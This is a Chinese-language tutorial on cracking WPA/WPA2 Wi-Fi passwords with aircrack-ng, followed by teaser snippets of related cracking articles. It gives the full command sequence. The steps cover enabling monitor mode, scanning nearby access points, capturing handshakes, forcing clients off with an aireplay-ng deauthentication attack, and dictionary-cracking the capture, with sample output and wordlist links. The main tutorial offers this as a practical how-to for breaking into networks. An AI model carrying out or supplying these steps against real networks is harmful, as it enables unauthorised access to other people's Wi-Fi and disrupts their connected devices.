aircrack-ng 字典破解WPA / WPA2

1. 安装

首先安装两个扩展
sudo apt-get install build-essential
sudo apt-get install
libssl-dev

然后到http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
下载最新版的aircrack-ng,解压它
tar -zxvf aircrack-ng-1.1.tar.gz
cd
aircrack-ng-1.1
gedit common.mak
找到 CFLAGS ?= -g -W -Wall -Werror -O3
并把它改为
CFLAGS ?= -g -W -Wall -O3
保存好后,开始编译安装
make
sudo make
install
完了之后它会提示 Run ‘airodump-ng-oui-update’ as root (or with sudo) to
install or update Airodump-ng OUI file (Internet connection
required).
于是输入
sudo airodump-ng-oui-update
更新好后即可。

2. 启动无线网卡监控模式:


[email protected]7420:~$ sudo airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
953 avahi-daemon
954 avahi-daemon
985 NetworkManager
1206 wpa_supplicant
18593 dhclient
Process with PID 18593 (dhclient) is running on interface wlan0

Interface Chipset Driver

wlan0 Intel 2230 iwlwifi - [phy0]
(monitor mode enabled on mon0)

3. 扫描无线AP,找到满意的热点之后,ctrl+c终止扫描:

上部分为热点列表,下部分为连接在热点上的客户端的列表。


[email protected]7420:~$ sudo airodump-ng mon0

CH 11 ][ Elapsed: 8 s ][ 2014-05-18 11:55

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:10:77:AA:XX:82 -88 2 0 0 6 54e WPA2 CCMP PSK Netcore
D8:15:0D:21:XX:CA -84 2 0 0 6 54e. WPA2 CCMP PSK TP-LINK_211CCA
14:E6:E4:93:XX:48 -87 2 0 0 6 54e. WPA2 CCMP PSK TP-LINK_936048
D8:15:0D:1B:XX:A6 -86 2 0 0 6 54e. WPA2 CCMP PSK Wiann2061
00:36:76:18:XX:28 -50 83 39 2 11 54e. WPA2 CCMP PSK kk-link
A4:17:31:38:XX:CC -63 0 0 0 11 54e WPA2 CCMP PSK mayouyou
00:87:36:08:XX:2C -68 5 0 0 6 54e. WPA2 CCMP PSK 360WiFi-482C
CC:34:29:40:XX:16 -127 0 110 22 11 -1 WPA <length: 0>

BSSID STATION PWR Rate Lost Frames Probe

00:36:76:18:XX:28 68:17:29:AF:XX:4C 0 0e- 0e 0 40
CC:34:29:40:XX:16 8C:7B:9D:86:XX:3B -1 0e- 0 0 4
CC:34:29:40:XX:16 0C:82:68:2A:XX:E3 -1 0e- 0 0 11
CC:34:29:40:XX:16 0C:82:68:2A:XX:F4 -1 0e- 0 0 95

[email protected]-Inspiron-7420:~$

4. 抓包

sudo airodump-ng -c 6 –w longas mon0 
这个窗口不要关。

参数解释:

-c 这里我们设置目标AP的工作频道,通过观察,我们要进行攻击测试的无线路由器工作频道为6;

-w 后跟要保存的文件名,这里w就是“write写”的意思,所以输入自己希望保持的文件名,这里我就写为longas。那么,小黑们一定要注意的是:这里我们虽然设置保存的文件名是longas,但是生成的文件却不是longas.cap,而是longas-01.cap。

5.攻击

sudo aireplay-ng -0 1 –a AP的mac -c 客户端的mac mon0 

参数解释:

-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为1,大家可以根据实际情况设置为10不等;

-a 后跟AP的MAC地址;

-c 后跟客户端的MAC地址;

若第三步的窗口中出现握手包,表示攻击有效。

6. 破解

sudo aircrack-ng -w dic 捕获的cap文件 

7. 破解完成之后关闭虚拟网卡mon0


[email protected]7420:~$ sudo airmon-ng stop mon0

Interface Chipset Driver

wlan0 Intel 2230 iwlwifi - [phy0]
mon0 Intel 2230 iwlwifi - [phy0] (removed)

字典文件下载地址:

http://bbs.ecjtu.org/thread-29817-1-1.html

http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists

详细步骤查看:http://netsecurity.51cto.com/art/201105/264844_all.htm

时间: 2024-10-10 00:09:19

aircrack-ng 字典破解WPA / WPA2的相关文章

WPS, 破解WPA/WPA2密钥的捷径

1.关于WPS(WIFI保护设置) WPS(WIFI保护设置)主要致力于简化无线网络的安全加密设置. 传统方式下,用户新建一个无线网络时,必须在接入点手动设置网络名(SSID)和安全密钥,然后在客户端密钥以阻止"不速之客"的闯入. WPS能够帮助用户自动设置网络名(SSID).配置最高级别的WPA2安全密钥,用户只要按下WPS按钮或输入PIN码就可以完成无线加密设置. 2.WPS的基本设置 1.在无线客户端上运行无线网卡配置工具,选择"连接到带有WPS的无线网络".

使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码。(转)

1.首先请不要使用此方法去搞破坏,去蹭Wi-Fi,因为不装逼地说,我认为技术本身的价值很大,尤其是在学习这个技术的过程中解决遇到的问题,当经过重重困难最后终于成功之后的喜悦又怎么能拿去蹭网呢.我在此过程中都是用自己路由做的测试,相信大家也可以从文中看到,所以请不要用技术做一些不好的事情. 2.欢迎使用Kali Linux 的朋友互相交流,大家共同进步学习. 索引: 1.工具 2.需要了解的知识 3.破解WEP 4.破解WPA/WPA2 5.其他 6.Q&A 7.参考文章 1.用到的工具: Air

Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

Kali Linux使用Aircrack破解wifi密码(wpa/wpa2) 要求: 安装有KaliLinux的计算机 支持监控模式的网卡,笔记本电脑一般都支持 字典文件 时间和耐心 这种攻击需要字典文件,一个好的字典至关重要.我以Kali Linux自带的rockyou字典为例,位于/user/share/wordlists/rockyou.txt.gz. 使用前先解压: # gzip -d /usr/share/wordlists/rockyou.txt.gz 注意:破解其他人的wifi密码

破解WPA/WPA2-PSK加密

下面以kali linux为例,带大家分别一起学习如何利用Aircrack 和 Cowpatty两种工具进行无线WPA/WPA-PSK的攻击与破解.如果大家是在vmware虚拟机上做破解攻击的话,你们需要先准备一个kali linux能够识别的外置无线网卡,然后再加载进虚拟的攻击机上,因为我是在自己本身的物理机上做的. 详细步骤如下: Step1:升级 Aircrack-ng 为了更好地识别出无线网络设备以及环境,我们现在先对Airodump-ng的OUI库进行升级,想进入到Aircrack-n

取代奶瓶Minidwep-gtk破解WPA 全攻略

取代奶瓶Minidwep-gtk 破 WPA 全攻略  目录 1. CDlinux 下使用 minidwepgtk 获取握手包并使用自带的字典破解 2. 自带的字典破解不出密码时使用 U 盘外挂字典继续暴力破解密码 3. 将握手包拷贝到 Windows 系统下使用 ewsa 工具高速破解密码 4.破解 WPA 加密"握手包"字典的制作 一.CDlinux 下使用 minidwepgtk 获取握手包并使用自带的字典破解 插好网卡,在 minidwep-gtk 上面点鼠标右键选择执行. 跳

如何获得WPA握手包&amp;EWSA破解WPA密码教程[zz]

获得WPA\WPA2 握手包的方法有很多,下面介绍通过aircrack-ng工具包来载获握手数据包. 1.下载aircrack-ng工具包. 2.终端里输入 sudo airmon-ng start wlan0 启动数据监控模式. 3.终端里输入 sudo airodump -w wpa mon0 ( 此时监控端口应该为 mon0 ,DATA保存到以wpa命名的文件中了). 这时大家就可以看到要抓包的AP DATA为0 4.依次:网络连接图标->点鼠标左键->鼠标移到要抓取握手数据包的AP上面

无线网卡加密方式wep wpa/wpa2 介绍

常见无线热点的配置选项:无线名称路由器的无线(Wi-Fi)名称.无线密码无线加密使用WPA2-PSK/WPA-PSK加密方式.AES加密算法,无线密码为8-63个字符,最好是数字.字母.符号的组合.信道无线数据信号传送的通道,建议保持默认的自动,此时路由器会自动根据周围的无线环境选择一个最好的信道.模式路由器工作的无线模式.频段带宽路由器传输无线数据的频段宽度.信号强度可以根据实际使用需要选择不同档次的信号强度.开启AP隔离开启之后可以安全隔离连接到路由器的各个无线设备. 加密方式: 1. WE

无线Wifi密码破解(WPA)

PIN破解是近年来流行起来的wifi密码破解最有效的方式了.那什么是PIN?有什么用? 这里要先说一个概念,WPS, WPS(Wifi Protected Setup)是一种免输密码和SSID的建议无线配置协议,它的好处是能够让支持WPS的设备,在第一次连接某个设备时,能够通过不用手工输入SSID和密码的方式,自动建立连接. 因为方便,所以危险.如果我们知道一个路由的SSID和PIN,那么我们就可以光明正大的进到这个wifi网络中,即时我们不知道wifi的密码也没关系.而一旦我们知道PIN,那W

关于WPA/WPA2 4次握手

简单描述一下WPA/WPA2的4次握手中的一些关键词: WPA/WPA2使用4次握手的方式来产生所需要的密钥.四次握手通过一系列的交互,从PMK(Pairwise Master Key)生成PTK(Pairwise Transient Key).PMK来自MSK(Master Session Key),是MSK的前256位,32字节. PTK包含3个部分,KCK(Key Confirmation Key),KEK(Key Encryption Key),TK(Temporal Key). PTK